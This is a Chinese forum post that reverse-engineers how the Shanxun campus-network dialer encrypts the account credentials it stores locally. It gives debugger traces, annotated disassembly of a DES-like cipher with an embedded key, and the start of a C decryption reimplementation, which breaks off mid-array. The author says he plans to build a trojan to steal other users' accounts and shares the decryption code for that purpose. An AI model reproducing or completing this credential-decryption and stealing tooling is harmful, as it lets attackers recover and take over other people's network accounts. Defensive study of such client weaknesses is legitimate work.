
[调试逆向] [原创]闪讯客户端本地密码加密算法分析

2011-7-4 18:36 17373

在浙江上大学的同学们肯定都对闪讯恨之入骨吧,在学校里上网只能用闪讯,这么贵,还不允许路由,正好响应超版狼大人的号召,来发篇原创,无奈本人技术太菜。。请大牛勿笑。。
在这里先给自己的blog打个小广告。希望杭电的同学看到以后能请我吃个饭
http://www.kkmonster.com/    (李醒涵)
直接拿出客户端看看
先看看PE结构,结果悲剧了,用VMP处理过的,我也懒得直接去看了,VMP我搞不定呀!!
平时用闪讯的时候会注意到,当触发密码编辑框的killfocus消息时,输入的密码会被加密,长度变成了14位的一个字符串
OD加载之,搞不定壳,直接F9跑起来。。。分析之
; sub_00413020 — OllyDbg dump, 32-bit Intel syntax (thiscall-style: ecx = this).
; this -> esi; edi = the single stack argument ([esp+10h] after the three pushes),
; cleaned up by retn 4. Nine calls 004389B4(edi, <imm>, this+<offset>) and the
; 00438B58/00438B4C/00438B52 calls follow the same (edi, <imm>, member) shape;
; the immediates (417h .. 3F1h) are presumably dialog control ids and the 1Eh
; pushed before 00438B52 presumably a length limit on the field just read —
; looks like an MFC DoDataExchange routine; verify.
; NOTE(review): the author observes that the text fetched at 004130CC is
; "xinlianxiaohui" whatever was typed (register dump below) — the edit-box
; contents are a decoy, not the real credential.
00413020    53              push    ebx
00413021    56              push    esi
00413022    57              push    edi
00413023    8B7C24 10       mov     edi, dword ptr [esp+10]          ; edi = stack argument
00413027    8BF1            mov     esi, ecx                         ; esi = this
00413029    57              push    edi
0041302A    E8 11E1FEFF     call    00401140
0041302F    8D86 E4250000   lea     eax, dword ptr [esi+25E4]
00413035    50              push    eax
00413036    68 17040000     push    417
0041303B    57              push    edi
0041303C    E8 73590200     call    004389B4                         ; 004389B4(edi, 417h, this+25E4h)
00413041    8D8E B8260000   lea     ecx, dword ptr [esi+26B8]
00413047    51              push    ecx
00413048    68 16040000     push    416
0041304D    57              push    edi
0041304E    E8 61590200     call    004389B4
00413053    8D96 30270000   lea     edx, dword ptr [esi+2730]
00413059    52              push    edx
0041305A    68 15040000     push    415
0041305F    57              push    edi
00413060    E8 4F590200     call    004389B4
00413065    8D86 A8270000   lea     eax, dword ptr [esi+27A8]
0041306B    50              push    eax
0041306C    68 14040000     push    414
00413071    57              push    edi
00413072    E8 3D590200     call    004389B4
00413077    8D8E 20280000   lea     ecx, dword ptr [esi+2820]
0041307D    51              push    ecx
0041307E    68 11040000     push    411
00413083    57              push    edi
00413084    E8 2B590200     call    004389B4
00413089    8D96 60280000   lea     edx, dword ptr [esi+2860]
0041308F    52              push    edx
00413090    68 0E040000     push    40E
00413095    57              push    edi
00413096    E8 19590200     call    004389B4
0041309B    8D86 14290000   lea     eax, dword ptr [esi+2914]
004130A1    50              push    eax
004130A2    68 F2030000     push    3F2
004130A7    57              push    edi
004130A8    E8 07590200     call    004389B4
004130AD    8D8E 8C290000   lea     ecx, dword ptr [esi+298C]
004130B3    51              push    ecx
004130B4    68 03040000     push    403
004130B9    57              push    edi
004130BA    E8 F5580200     call    004389B4
004130BF    8D9E CC290000   lea     ebx, dword ptr [esi+29CC]        ; ebx = this+29CCh (destination of the text below)
004130C5    53              push    ebx
004130C6    68 F1030000     push    3F1
004130CB    57              push    edi
004130CC    E8 875A0200     call    00438B58                         ; fetch the password edit-box text (author's note)
004130D1    6A 1E           push    1E                               ; 1Eh = 30, presumably a max-length check on that field
004130D3    53              push    ebx
004130D4    57              push    edi
004130D5    E8 785A0200     call    00438B52
004130DA    8D96 D0290000   lea     edx, dword ptr [esi+29D0]
004130E0    52              push    edx
004130E1    68 F5030000     push    3F5
004130E6    57              push    edi
004130E7    E8 605A0200     call    00438B4C
004130EC    8D86 D4290000   lea     eax, dword ptr [esi+29D4]
004130F2    50              push    eax
004130F3    68 F9030000     push    3F9
004130F8    57              push    edi
004130F9    E8 5A5A0200     call    00438B58
004130FE    8D8E D8290000   lea     ecx, dword ptr [esi+29D8]
00413104    51              push    ecx
00413105    68 0D040000     push    40D
0041310A    57              push    edi
0041310B    E8 3C5A0200     call    00438B4C
00413110    81C6 DC290000   add     esi, 29DC                        ; esi = this+29DCh (this is no longer needed after this point)
00413116    56              push    esi
00413117    68 12040000     push    412
0041311C    57              push    edi
0041311D    E8 365A0200     call    00438B58
00413122    5F              pop     edi
00413123    5E              pop     esi
00413124    5B              pop     ebx
00413125    C2 0400         retn    4                                ; callee pops the one stack argument

注意这里,004130CC处调用过程来获取编辑框的内容
看看寄存器里的数据:
EAX 010633E8 ASCII "xinlianxiaohui"
ECX 0012F070
EDX 00000030
EBX 0012F070
ESP 0012B528
EBP 0012B540
ESI 004D2964 NetKeepe.004D2964
EDI 0012F070
EIP 75A370ED USER32.GetWindowTextA
从编辑框里获取到的字符串是xinlianxiaohui,其实到后来我发现这个是骗人的。。不管密码是什么编辑框里的串永远是这个
本来想看看下边的加密算法,进了call后发现全用vmp变形过了,悲剧了,先来看看他把帐号密码保存在哪里吧,监视注册表,发现程序对注册表没有操作,那应该是在文件里了,对CreateFile下断,中断4次后注意堆栈
0012AE18 75CF0BC7 /CALL 到 CreateFileW 来自 kernel32.75CF0BC2
0012AE1C 002A6FA8 |FileName = "C:\ChinaNetSn\bin\ams.nkd"
0012AE20 80000000 |Access = GENERIC_READ
0012AE24 00000000 |ShareMode = 0
0012AE28 0012AEA0 |pSecurity = 0012AEA0
0012AE2C 00000003 |Mode = OPEN_EXISTING
0012AE30 00000080 |Attributes = NORMAL
0012AE34 00000000 \hTemplateFile = NULL

这里程序要使用闪讯目录下的bin\ams.nkd文件
继续看了半天,没有用到其它文件,除了这个和闪讯有点关系以外还有一个Credit文件,别的都是无关痛痒的,我感觉本地的密码应该保存在这个ams.nkd文件里吧,于是再对WriteFile下断,登录一下,试试,结果登录出现异常,而且WriteFile也没调用,后来证明是被hook掉了
试着用PhantOm把OD给隐藏掉,结果OD遇到特权指令给卡死了,然后OD进程被隐藏了,想关都关不掉,妈的,一个拨号软件放这么多保护要死呀!
悲剧地重启一下机器,仔细想想,决定不看程序了,从文件入手吧!
试着把Credit文件给删了,然后运行OD后发现帐号列表成空了,猜想一下,大概应该就在这个文件里了!
打开文件看看,一堆乱码,晕,加密了还!
重新载入OD,对CreateFile下条件断点byte ptr [esp+ 4] == ‘C’运行之,看中断时的堆栈
0012B0DC 75CF0BC7 /CALL 到 CreateFileW 来自 kernel32.75CF0BC2
0012B0E0 001C67E0 |FileName = "Credit"
0012B0E4 80000000 |Access = GENERIC_READ
0012B0E8 00000003 |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
0012B0EC 00000000 |pSecurity = NULL
0012B0F0 00000003 |Mode = OPEN_EXISTING
0012B0F4 00000080 |Attributes = NORMAL
0012B0F8 00000000 \hTemplateFile = NULL

对了,就是这里,没错了,向上返回两层retn,然后看看它返回的文件指针,现在的eax是154,对ReadFile下断吧,中断后再看堆栈里的数据:
0012B0F8 75CEDAFD /CALL 到 ReadFile 来自 kernel32.75CEDAF8
0012B0FC 00000154 |hFile = 00000154 (window)
0012B100 0012D5F4 |Buffer = 0012D5F4
0012B104 0000168C |BytesToRead = 168C (5772.)
0012B108 0012B164 |pBytesRead = 0012B164
0012B10C 00000000 \pOverlapped = NULL

这里看到了,文件指针是154,就是Credit文件了,要读的长度为168C,我们来看看文件的长度,正好一次全部读完,再单步几句,可以看到这里:
00414CCC /0F84 29010000 je 00414DFB
00414CD2 |68 949E4500 push 00459E94 ; ASCII "EncodeCredit,encode",LF
00414CD7 |E8 5450FFFF call 00409D30

貌似这里是解密算法
这里一个je,直接跳走了,来到这里:
00414DFB 68 7C9E4500 push 00459E7C ; ASCII "EncodeCredit,decode",LF
00414E00 E8 2B4FFFFF call 00409D30

看样子应该是解密的,进去看看,丫丫奶奶的,好乱的代码,妈的,硬着头皮来理解一下吧:
; Inside the "EncodeCredit,decode" path (00414E05 onward; the function's
; start and end are not shown in this excerpt).
00414E05 8B6C24 18 mov ebp, dword ptr [esp+18] ; ebp = buffer start (argument at [esp+18h])
00414E09 83C4 04 add esp, 4 ; discard the string pushed for the 00409D30 call above
00414E0C 897424 18 mov dword ptr [esp+18], esi
00414E10 8B45 00 mov eax, dword ptr [ebp] ; eax = first dword of the buffer
00414E13 40 inc eax ; eax = dword + 1
00414E14 85C0 test eax, eax
00414E16 0F8E C5000000 jle 00414EE1 ; taken when dword+1 <= 0 (signed), i.e. the first dword is -1 or negative — the author reads this as the "empty file" check
00414E1C 8D75 50 lea esi, dword ptr [ebp+50] ; esi = buffer + 50h
00414E1F 8D4E E0 lea ecx, dword ptr [esi-20] ; ecx = buffer + 30h

再往下看就可以发现问题了:
; Five 004119E0(ptr, len) calls over fixed fields of the Credit buffer
; (ebp = buffer start, esi = ebp+50h from the lines above). The author
; identifies 004119E0 as the decrypt routine; (ptr, len) = (field, byte count).
00414E22 6A 20 push 20 ; len = 20h
00414E24 51 push ecx ; ptr = buffer + 30h
00414E25 E8 B6CBFFFF call 004119E0
00414E2A 6A 20 push 20 ; len = 20h
00414E2C 56 push esi ; ptr = buffer + 50h
00414E2D E8 AECBFFFF call 004119E0
00414E32 8D56 20 lea edx, dword ptr [esi+20] ; buffer + 70h
00414E35 6A 10 push 10 ; len = 10h
00414E37 52 push edx
00414E38 E8 A3CBFFFF call 004119E0
00414E3D 8D46 30 lea eax, dword ptr [esi+30] ; buffer + 80h — a single call for this field (the C reproduction below invokes encode(p + 0x80, 0x10) twice)
00414E40 6A 10 push 10 ; len = 10h
00414E42 50 push eax
00414E43 E8 98CBFFFF call 004119E0
00414E48 8D4E B8 lea ecx, dword ptr [esi-48] ; buffer + 8
00414E4B 6A 28 push 28 ; len = 28h
00414E4D 51 push ecx
00414E4E E8 8DCBFFFF call 004119E0

这里的004119E0函数应该就是解密的了,它有两个参数,第一个参数是需要解密的缓冲区,第二个参数是需要解密的缓冲区长度
不多废话,进去看看:
; 004119E0(buffer, len) — walks the buffer in 8-byte blocks (the listing ends at
; the loop branch; the epilogue is not shown). Stack after `push esi` plus the two
; pushes below: [esp+10] = arg1 (buffer), [esp+14] = arg2 (len).
004119E0 56 push esi
004119E1 6A 01 push 1
004119E3 68 309B4500 push 00459B30 ; ASCII "xinlides" — a constant built into the binary
004119E8 E8 9310FFFF call 00402A80 ; 00402A80("xinlides", 1): presumably key setup from that constant (body not shown) — confirm
004119ED 8B4424 14 mov eax, dword ptr [esp+14] ; eax = len
004119F1 8B7424 10 mov esi, dword ptr [esp+10] ; esi = buffer
004119F5 83C4 08 add esp, 8 ; discard the two arguments of 00402A80
004119F8 85C0 test eax, eax
004119FA 7E 18 jle short 00411A14 ; len <= 0 (signed): nothing to do
004119FC 57 push edi
004119FD 8D78 07 lea edi, dword ptr [eax+7]
00411A00 C1EF 03 shr edi, 3 ; edi = (len + 7) / 8 = block count rounded UP: a len that is not a multiple of 8 still processes a whole last block
00411A03 56 push esi
00411A04 56 push esi
00411A05 E8 7612FFFF call 00402C80 ; 00402C80(block, block): same pointer for both arguments, i.e. in place
00411A0A 83C4 08 add esp, 8
00411A0D 83C6 08 add esi, 8 ; next 8-byte block
00411A10 4F dec edi
00411A11 ^ 75 F0 jnz short 00411A03

再往里进的话就是不堪入目的代码呀,完全看不懂了,但这里的确是解密的地方,现在看看原来的缓冲区,可以看到乱码已经被还原了,出来了我的帐号。
总结一下解密算法,来模拟一下解密,
它以8字节为一组来进行解密,每8字节的解密过程按照我的思路来大概还原一下:
; 00402D30(src, dst) — serialises the two dwords at src into 8 bytes at dst,
; most-significant byte first (the listing stops before the return).
00402D30 8B4C24 04 mov ecx, dword ptr [esp+4] ; ecx = src (two dwords)
00402D34 8B4424 08 mov eax, dword ptr [esp+8] ; eax = dst (8 output bytes)
00402D38 8B11 mov edx, dword ptr [ecx] ; edx = dword 0
00402D3A 83C1 04 add ecx, 4 ; ecx -> dword 1
00402D3D C1EA 18 shr edx, 18 ; >> 24 (18h): top byte of dword 0
00402D40 8810 mov byte ptr [eax], dl ; dst[0]
00402D42 8B51 FC mov edx, dword ptr [ecx-4] ; reload dword 0
00402D45 40 inc eax ; -> dst[1]
00402D46 C1EA 10 shr edx, 10 ; >> 16 (10h)
00402D49 8810 mov byte ptr [eax], dl ; dst[1]
00402D4B 8B51 FC mov edx, dword ptr [ecx-4] ; reload dword 0
00402D4E 40 inc eax ; -> dst[2]
00402D4F C1EA 08 shr edx, 8 ; >> 8
00402D52 8810 mov byte ptr [eax], dl ; dst[2]
00402D54 8A51 FC mov dl, byte ptr [ecx-4] ; low byte of dword 0
00402D57 40 inc eax ; -> dst[3]
00402D58 8810 mov byte ptr [eax], dl ; dst[3]
00402D5A 8B11 mov edx, dword ptr [ecx] ; edx = dword 1
00402D5C 40 inc eax ; -> dst[4]
00402D5D C1EA 18 shr edx, 18 ; >> 24
00402D60 8810 mov byte ptr [eax], dl ; dst[4]
00402D62 8B11 mov edx, dword ptr [ecx] ; reload dword 1
00402D64 40 inc eax ; -> dst[5]
00402D65 C1EA 10 shr edx, 10 ; >> 16
00402D68 8810 mov byte ptr [eax], dl ; dst[5]
00402D6A 8B11 mov edx, dword ptr [ecx] ; reload dword 1
00402D6C 40 inc eax ; -> dst[6]
00402D6D C1EA 08 shr edx, 8 ; >> 8
00402D70 8810 mov byte ptr [eax], dl ; dst[6]
00402D72 8A09 mov cl, byte ptr [ecx] ; low byte of dword 1
00402D74 8848 01 mov byte ptr [eax+1], cl ; dst[7] (eax still points at dst[6])

加上注释以后就比较容易理解了,但这里的操作都和第一句取到的ecx指针密切相关:可以看到ecx指向8个字节,也就是两个双字;这8个字节是怎么得到的,再来看
; 00402CC0(src, dst) — packs 8 bytes at src into two dwords at dst, most-
; significant byte first (inverse of 00402D30 above). src is read from [esp+4]
; before `push esi`; dst is [esp+C] after it. dword 0 is built in esi and stored
; through [eax-4] once eax has been advanced to dword 1.
00402CC0 8B4C24 04 mov ecx, dword ptr [esp+4] ; ecx = src
00402CC4 33C0 xor eax, eax
00402CC6 56 push esi
00402CC7 8A01 mov al, byte ptr [ecx] ; src[0]
00402CC9 8BD0 mov edx, eax
00402CCB 8B4424 0C mov eax, dword ptr [esp+C] ; eax = dst
00402CCF C1E2 18 shl edx, 18 ; src[0] << 24
00402CD2 8910 mov dword ptr [eax], edx
00402CD4 8B30 mov esi, dword ptr [eax] ; esi accumulates dword 0
00402CD6 41 inc ecx
00402CD7 33D2 xor edx, edx
00402CD9 83C0 04 add eax, 4 ; eax -> dst dword 1
00402CDC 8A11 mov dl, byte ptr [ecx] ; src[1]
00402CDE C1E2 10 shl edx, 10 ; << 16
00402CE1 0BF2 or esi, edx
00402CE3 41 inc ecx
00402CE4 33D2 xor edx, edx
00402CE6 8970 FC mov dword ptr [eax-4], esi
00402CE9 8A31 mov dh, byte ptr [ecx] ; src[2] lands in bits 8..15 via dh
00402CEB 0BF2 or esi, edx
00402CED 41 inc ecx
00402CEE 33D2 xor edx, edx
00402CF0 8970 FC mov dword ptr [eax-4], esi
00402CF3 8A11 mov dl, byte ptr [ecx] ; src[3] in bits 0..7
00402CF5 0BF2 or esi, edx
00402CF7 41 inc ecx
00402CF8 33D2 xor edx, edx
00402CFA 8970 FC mov dword ptr [eax-4], esi ; dword 0 complete
00402CFD 8A11 mov dl, byte ptr [ecx] ; src[4]
00402CFF C1E2 18 shl edx, 18 ; << 24
00402D02 8910 mov dword ptr [eax], edx
00402D04 8B30 mov esi, dword ptr [eax] ; esi accumulates dword 1
00402D06 41 inc ecx
00402D07 33D2 xor edx, edx
00402D09 8A11 mov dl, byte ptr [ecx] ; src[5]
00402D0B C1E2 10 shl edx, 10 ; << 16
00402D0E 0BF2 or esi, edx
00402D10 41 inc ecx
00402D11 33D2 xor edx, edx
00402D13 8930 mov dword ptr [eax], esi
00402D15 8A31 mov dh, byte ptr [ecx] ; src[6] in bits 8..15
00402D17 0BF2 or esi, edx
00402D19 33D2 xor edx, edx
00402D1B 8930 mov dword ptr [eax], esi
00402D1D 8A51 01 mov dl, byte ptr [ecx+1] ; src[7] (ecx was not advanced after src[6])
00402D20 0BD6 or edx, esi
00402D22 5E pop esi
00402D23 8910 mov dword ptr [eax], edx ; dword 1 complete
00402D25 C3 retn

再看看这里

; 00402D80(block, keys) — 8-byte block transform (OllyDbg dump; the listing ends
; before the retn).
; In:  arg1 = [esp+8] after `push ecx`: pointer to two dwords, read at 00402D88/
;      00402D8A and written back in place at 00402FEF/00402FF3 ([esp+14] after
;      `pop edi` is the same slot).
;      arg2 = [esp+1C] after the five pushes: pointer loaded into esi at 00402DF9
;      and advanced by four dwords per iteration of the 8-iteration loop (counter
;      at [esp+10]) — 32 dwords consumed in total; presumably the round-key
;      schedule.
; Shape: (1) 00402D8D..00402E22 swaps bit groups between the two halves using the
;      masks 0F0F0F0F, 0000FFFF, 33333333, 00FF00FF and (after a rotate-left-by-1)
;      AAAAAAAA; (2) the loop 00402E24..00402F58 does two rounds per iteration: the
;      active half is rotated right by 4 (or not), xored with a key dword, split
;      into four 6-bit indexes (shr 18h/10h/8/0, and 3F) into eight 64-dword
;      tables at 4581E4..4588E4, the four lookups are ORed and xored into the
;      other half; (3) 00402F5E..00402FE7 applies the inverse of (1).
; This is the bit-twiddling form of the DES initial/final permutation with SP-box
; lookup tables and 16 rounds — presumably DES; confirm against the tables.
00402D80 51 push ecx ; reserves one dword: the loop counter slot ([esp+10] below)
00402D81 8B4C24 08 mov ecx, dword ptr [esp+8] ; ecx = arg1 (block pointer)
00402D85 53 push ebx
00402D86 55 push ebp
00402D87 56 push esi
00402D88 8B01 mov eax, dword ptr [ecx] ; eax = half 0
00402D8A 8B51 04 mov edx, dword ptr [ecx+4] ; edx = half 1
00402D8D 8BC8 mov ecx, eax
00402D8F 8BF2 mov esi, edx
00402D91 C1E9 04 shr ecx, 4
00402D94 81E1 0F0F0F>and ecx, 0F0F0F0F ; permutation stage 1: 4-bit groups
00402D9A 81E6 0F0F0F>and esi, 0F0F0F0F
00402DA0 33CE xor ecx, esi
00402DA2 57 push edi
00402DA3 33D1 xor edx, ecx
00402DA5 C74424 10 0>mov dword ptr [esp+10], 8 ; loop counter = 8 iterations
00402DAD C1E1 04 shl ecx, 4
00402DB0 33C1 xor eax, ecx
00402DB2 8BF2 mov esi, edx
00402DB4 8BC8 mov ecx, eax
00402DB6 81E6 FFFF00>and esi, 0FFFF ; stage 2: 16-bit halves
00402DBC C1E9 10 shr ecx, 10
00402DBF 33CE xor ecx, esi
00402DC1 33D1 xor edx, ecx
00402DC3 C1E1 10 shl ecx, 10
00402DC6 33C1 xor eax, ecx
00402DC8 8BCA mov ecx, edx
00402DCA C1E9 02 shr ecx, 2
00402DCD 8BF0 mov esi, eax
00402DCF 81E1 333333>and ecx, 33333333 ; stage 3: 2-bit groups
00402DD5 81E6 333333>and esi, 33333333
00402DDB 33CE xor ecx, esi
00402DDD 33C1 xor eax, ecx
00402DDF C1E1 02 shl ecx, 2
00402DE2 33D1 xor edx, ecx
00402DE4 8BF0 mov esi, eax
00402DE6 8BCA mov ecx, edx
00402DE8 81E6 FF00FF>and esi, 0FF00FF ; stage 4: bytes
00402DEE C1E9 08 shr ecx, 8
00402DF1 81E1 FF00FF>and ecx, 0FF00FF
00402DF7 33CE xor ecx, esi
00402DF9 8B7424 1C mov esi, dword ptr [esp+1C] ; esi = arg2 (key pointer; [esp+1C] after five pushes)
00402DFD 33C1 xor eax, ecx
00402DFF C1E1 08 shl ecx, 8
00402E02 33D1 xor edx, ecx
00402E04 8BCA mov ecx, edx
00402E06 03D2 add edx, edx
00402E08 C1E9 1F shr ecx, 1F
00402E0B 0BCA or ecx, edx ; ecx = rotl(half 1, 1)
00402E0D 8BD1 mov edx, ecx
00402E0F 33D0 xor edx, eax
00402E11 81E2 AAAAAA>and edx, AAAAAAAA ; stage 5: odd bits
00402E17 33C2 xor eax, edx
00402E19 33CA xor ecx, edx
00402E1B 8BD0 mov edx, eax
00402E1D 03C0 add eax, eax
00402E1F C1EA 1F shr edx, 1F
00402E22 0BD0 or edx, eax ; edx = rotl(eax, 1); ecx/edx are the working halves from here on
00402E24 8B1E mov ebx, dword ptr [esi] ; loop top: ebx = key[0]
00402E26 8BC1 mov eax, ecx
00402E28 8BF9 mov edi, ecx
00402E2A 83C6 04 add esi, 4
00402E2D C1E0 1C shl eax, 1C
00402E30 C1EF 04 shr edi, 4
00402E33 0BC7 or eax, edi ; eax = rotr(ecx, 4)
00402E35 83C6 04 add esi, 4
00402E38 33C3 xor eax, ebx ; ^ key[0]
00402E3A 83C6 04 add esi, 4
00402E3D 8BD8 mov ebx, eax
00402E3F 8BF8 mov edi, eax
00402E41 C1EB 10 shr ebx, 10
00402E44 83E3 3F and ebx, 3F ; 6-bit index from bits 16..21
00402E47 83C6 04 add esi, 4 ; esi is now 4 dwords past key[0]; key[1..3] are read as [esi-C], [esi-8], [esi-4]
00402E4A C1EF 18 shr edi, 18
00402E4D 8B2C9D E483>mov ebp, dword ptr [ebx*4+4583E4] ; table at 4583E4 (64 dwords)
00402E54 8BD8 mov ebx, eax
00402E56 83E7 3F and edi, 3F
00402E59 83E0 3F and eax, 3F
00402E5C C1EB 08 shr ebx, 8
00402E5F 8B3CBD E481>mov edi, dword ptr [edi*4+4581E4] ; table at 4581E4, index = bits 24..29
00402E66 83E3 3F and ebx, 3F
00402E69 0BFD or edi, ebp
00402E6B 8B2C9D E485>mov ebp, dword ptr [ebx*4+4585E4] ; table at 4585E4, bits 8..13
00402E72 8B1C85 E487>mov ebx, dword ptr [eax*4+4587E4] ; table at 4587E4, bits 0..5
00402E79 8B46 F4 mov eax, dword ptr [esi-C] ; eax = key[1]
00402E7C 0BFD or edi, ebp
00402E7E 33C1 xor eax, ecx ; ^ the unrotated half
00402E80 0BFB or edi, ebx ; edi = OR of the four lookups for key[0]
00402E82 8BD8 mov ebx, eax
00402E84 8BE8 mov ebp, eax
00402E86 C1EB 18 shr ebx, 18
00402E89 83E3 3F and ebx, 3F
00402E8C C1ED 10 shr ebp, 10
00402E8F 8B1C9D E482>mov ebx, dword ptr [ebx*4+4582E4] ; table at 4582E4, bits 24..29
00402E96 83E5 3F and ebp, 3F
00402E99 0B1CAD E484>or ebx, dword ptr [ebp*4+4584E4] ; table at 4584E4, bits 16..21
00402EA0 8BE8 mov ebp, eax
00402EA2 C1ED 08 shr ebp, 8
00402EA5 83E5 3F and ebp, 3F
00402EA8 83E0 3F and eax, 3F
00402EAB 0B1CAD E486>or ebx, dword ptr [ebp*4+4586E4] ; table at 4586E4, bits 8..13
00402EB2 8B2C85 E488>mov ebp, dword ptr [eax*4+4588E4] ; table at 4588E4, bits 0..5
00402EB9 0BDD or ebx, ebp
00402EBB 0BDF or ebx, edi
00402EBD 33D3 xor edx, ebx ; round: edx ^= f(ecx, key[0..1])
00402EBF 8B5E F8 mov ebx, dword ptr [esi-8] ; ebx = key[2]
00402EC2 8BC2 mov eax, edx
00402EC4 8BFA mov edi, edx
00402EC6 C1E0 1C shl eax, 1C
00402EC9 C1EF 04 shr edi, 4
00402ECC 0BC7 or eax, edi ; eax = rotr(edx, 4)
00402ECE 33C3 xor eax, ebx ; ^ key[2]
00402ED0 8BD8 mov ebx, eax
00402ED2 8BF8 mov edi, eax
00402ED4 C1EB 10 shr ebx, 10
00402ED7 83E3 3F and ebx, 3F
00402EDA C1EF 18 shr edi, 18
00402EDD 8B2C9D E483>mov ebp, dword ptr [ebx*4+4583E4]
00402EE4 8BD8 mov ebx, eax
00402EE6 83E7 3F and edi, 3F
00402EE9 83E0 3F and eax, 3F
00402EEC C1EB 08 shr ebx, 8
00402EEF 8B3CBD E481>mov edi, dword ptr [edi*4+4581E4]
00402EF6 83E3 3F and ebx, 3F
00402EF9 0BFD or edi, ebp
00402EFB 8B2C9D E485>mov ebp, dword ptr [ebx*4+4585E4]
00402F02 8B1C85 E487>mov ebx, dword ptr [eax*4+4587E4]
00402F09 8B46 FC mov eax, dword ptr [esi-4] ; eax = key[3]
00402F0C 0BFD or edi, ebp
00402F0E 33C2 xor eax, edx ; ^ the unrotated half
00402F10 0BFB or edi, ebx
00402F12 8BD8 mov ebx, eax
00402F14 8BE8 mov ebp, eax
00402F16 C1EB 18 shr ebx, 18
00402F19 83E3 3F and ebx, 3F
00402F1C C1ED 10 shr ebp, 10
00402F1F 8B1C9D E482>mov ebx, dword ptr [ebx*4+4582E4]
00402F26 83E5 3F and ebp, 3F
00402F29 0B1CAD E484>or ebx, dword ptr [ebp*4+4584E4]
00402F30 8BE8 mov ebp, eax
00402F32 83E0 3F and eax, 3F
00402F35 C1ED 08 shr ebp, 8
00402F38 83E5 3F and ebp, 3F
00402F3B 0B1CAD E486>or ebx, dword ptr [ebp*4+4586E4]
00402F42 8B2C85 E488>mov ebp, dword ptr [eax*4+4588E4]
00402F49 8B4424 10 mov eax, dword ptr [esp+10] ; eax = loop counter
00402F4D 0BDD or ebx, ebp
00402F4F 0BDF or ebx, edi
00402F51 33CB xor ecx, ebx ; round: ecx ^= f(edx, key[2..3])
00402F53 48 dec eax
00402F54 894424 10 mov dword ptr [esp+10], eax
00402F58 ^ 0F85 C6FEFF>jnz 00402E24 ; 8 iterations x 2 rounds = 16 rounds, 32 key dwords
00402F5E 8BC1 mov eax, ecx
00402F60 5F pop edi
00402F61 C1E0 1F shl eax, 1F
00402F64 D1E9 shr ecx, 1
00402F66 0BC1 or eax, ecx ; eax = rotr(ecx, 1): undoing the stage-5 rotates
00402F68 8BC8 mov ecx, eax
00402F6A 33CA xor ecx, edx
00402F6C 81E1 AAAAAA>and ecx, AAAAAAAA ; inverse permutation, stage 5
00402F72 33D1 xor edx, ecx
00402F74 33C1 xor eax, ecx
00402F76 8BCA mov ecx, edx
00402F78 8BF0 mov esi, eax
00402F7A C1E1 1F shl ecx, 1F
00402F7D D1EA shr edx, 1
00402F7F 0BCA or ecx, edx ; ecx = rotr(edx, 1)
00402F81 81E6 FF00FF>and esi, 0FF00FF ; stage 4 inverse
00402F87 8BD1 mov edx, ecx
00402F89 C1EA 08 shr edx, 8
00402F8C 81E2 FF00FF>and edx, 0FF00FF
00402F92 33D6 xor edx, esi
00402F94 33C2 xor eax, edx
00402F96 C1E2 08 shl edx, 8
00402F99 33CA xor ecx, edx
00402F9B 8BF0 mov esi, eax
00402F9D 8BD1 mov edx, ecx
00402F9F 81E6 333333>and esi, 33333333 ; stage 3 inverse
00402FA5 C1EA 02 shr edx, 2
00402FA8 81E2 333333>and edx, 33333333
00402FAE 33D6 xor edx, esi
00402FB0 33C2 xor eax, edx
00402FB2 C1E2 02 shl edx, 2
00402FB5 33CA xor ecx, edx
00402FB7 8BD0 mov edx, eax
00402FB9 8BF1 mov esi, ecx
00402FBB C1EA 10 shr edx, 10
00402FBE 81E6 FFFF00>and esi, 0FFFF ; stage 2 inverse
00402FC4 33D6 xor edx, esi
00402FC6 33CA xor ecx, edx
00402FC8 C1E2 10 shl edx, 10
00402FCB 33C2 xor eax, edx
00402FCD 8BF1 mov esi, ecx
00402FCF 8BD0 mov edx, eax
00402FD1 81E6 0F0F0F>and esi, 0F0F0F0F ; stage 1 inverse
00402FD7 C1EA 04 shr edx, 4
00402FDA 81E2 0F0F0F>and edx, 0F0F0F0F
00402FE0 33D6 xor edx, esi
00402FE2 8BF2 mov esi, edx
00402FE4 C1E6 04 shl esi, 4
00402FE7 33F0 xor esi, eax
00402FE9 8B4424 14 mov eax, dword ptr [esp+14] ; eax = arg1 again ([esp+14] after pop edi)
00402FED 33D1 xor edx, ecx
00402FEF 8930 mov dword ptr [eax], esi ; write half 0 back in place
00402FF1 5E pop esi
00402FF2 5D pop ebp
00402FF3 8950 04 mov dword ptr [eax+4], edx ; write half 1
00402FF6 5B pop ebx
00402FF7 59 pop ecx ; frees the counter slot (retn follows; not in the listing)

这样结果就出来了。
简单的做个马了,盗点闪讯号来自己用用。
不过这个也不值钱。。具体的解密代码发出来大家一起娱乐

// Forward declarations for the reproduction below.
char* readdir();                        // builds "<install dir>\bin\Credit" from the registry; returns a new[]'d string (name collides with POSIX readdir(3) outside Windows)
char* readfile();                       // reads 0x168c bytes of the Credit file into a new[]'d buffer
void encode(char *buffer, int len);     // walks `len` bytes in 8-byte blocks: encode1 -> encode2 -> encode3, in place
char* encode1(char *buffer);            // returns a new[]'d 8-byte copy with each dword byte-reversed
void encode2(char *buffer, char *key);  // inline-asm port of 00402D80 (the block transform)
void encode3(char *buffer);             // in-place byte reversal of the two dwords at buffer
void rev(char *p);                      // declared here but no definition appears in the listing shown

// 128 bytes = 32 dwords, every byte <= 0x3F (four 6-bit values per dword, the
// layout that 00402D80 extracts with shr 24/16/8/0 + and 3F). Pushed by encode2's
// inline asm together with the block; presumably the 16-round key schedule that
// the original derives from the "xinlides" constant pushed at 004119E3 — confirm.
char pass[] =
{
0x1E, 0x30, 0x38, 0x3C, 0x1A, 0x09, 0x26, 0x0B, 0x19, 0x10, 0x3A, 0x3C, 0x1A, 0x38, 0x26, 0x0B,
0x21, 0x3D, 0x3A, 0x34, 0x11, 0x0C, 0x2E, 0x1A, 0x2F, 0x03, 0x32, 0x36, 0x22, 0x02, 0x2D, 0x1A,
0x14, 0x29, 0x36, 0x16, 0x26, 0x25, 0x2D, 0x32, 0x00, 0x0E, 0x36, 0x07, 0x0B, 0x2B, 0x0D, 0x36,
0x1B, 0x18, 0x27, 0x07, 0x09, 0x16, 0x1D, 0x36, 0x02, 0x37, 0x27, 0x07, 0x14, 0x0A, 0x19, 0x35,
0x07, 0x15, 0x27, 0x0F, 0x14, 0x01, 0x19, 0x35, 0x28, 0x05, 0x0F, 0x0B, 0x0E, 0x34, 0x1B, 0x35,
